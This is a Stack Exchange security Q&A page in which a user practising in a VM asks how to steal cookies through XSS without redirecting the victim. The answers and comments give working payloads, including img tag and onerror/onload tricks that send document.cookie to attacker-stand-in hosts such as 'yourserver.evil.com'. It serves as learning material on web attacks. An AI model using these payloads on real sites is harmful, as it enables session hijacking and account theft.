Information Security Stack Exchange

sign up log in

By using our site, you acknowledge that you have read and understand our Cookie Policy,Privacy Policy, and our Terms of Service.

• Questions
 
• Tags
 
• Users
 
• Badges
 
• Ask

up vote18down votefavorite

XSS cookie stealing without redirecting to another page

web-application javascript xsscookies

I'm practicing in VM following the OWASP guide. I know that is possible to steal the cookie by redirecting to "False" page etc. but I would like to steal the cookie without redirecting on another page.

So, if you have some guestbook and then you put:

document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie

How can I put this into existing page without redirecting?

Basically, what I want is when someone clicks on the link, grab the cookie and print it somewhere on the current page. Maybe in some alt tag or whatever.

Any ideas?

share improve this question

askedJan 22 '14 at 18:23

Thomas
91●1●1●3

editedJan 22 '14 at 18:52

Adi
40.7k●15●125●161

• Google changed the way cookies are written. I can't get session cookies using the above method. – user63648 Dec 16 '14 at 20:40

add a comment

2 Answers

order by                          active                         oldest                         votes                     

up vote25down vote

If you have full control of the JavaScript getting written to the page then you could just do

document.write('cookie: ' + document.cookie)

If you want it sent to another server, you could include it in a non-existent image:

document.write('<img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />')

The key here being whether you can output arbitrary JavaScript or whether you're limited in the kind of JavaScript you can get executed. Though if you're limited in what can be output you could use more advanced methods of getting your custom code to execute which are a bit out of scope of the question.

share improve this answer

answeredJan 22 '14 at 18:48

Steve
12k●2●28●55

editedSep 12 '15 at 21:54

Chris Dale
13.2k●10●47●94

• 6
  And you can even request it without writing to document: image = new Image(); image.src='http://example.com?c='+document.cookie;– НЛО May 23 '14 at 9:24
• I cannot edit your post but there is a missing quote, />) should be />'). Thanks anyway excellent answer – Alain Tiemblo Feb 25 '15 at 15:46
• This should not the case if the cookie is marked with the HttpOnly attribute. – Joaquin Brandan Mar 25 at 17:43

add a comment

up vote8down vote

To add onto Steve's answer, there are many different ways to achieve this. If your intention is to not have the user be aware of the stolen cookie, I would suggest the <img>attack Steve suggested. Although I prefer avoiding the document.write since it uses up so many characters:

<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>

share improve this answer

answeredMay 23 '14 at 7:49

disk0nn3ct
81●1●1

editedFeb 9 '17 at 20:51

nhahtdh
133●1●8

• This is nice and compact, but the problem is that it will recursively trigger the onerror handler unless an image is served from the attacker's page. – multithr3at3d Jun 4 at 20:47
• I uses this approach but as the source you can use an existing image and use the onload attribute for the payload: <img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://yourserver/?'+document.cookie>– coffeemakr Dec 15 at 16:00 

add a comment

meta chat tour help blog privacy policy legalcontact us full site

Download the Stack Exchange Android app

2018 Stack Exchange, Inc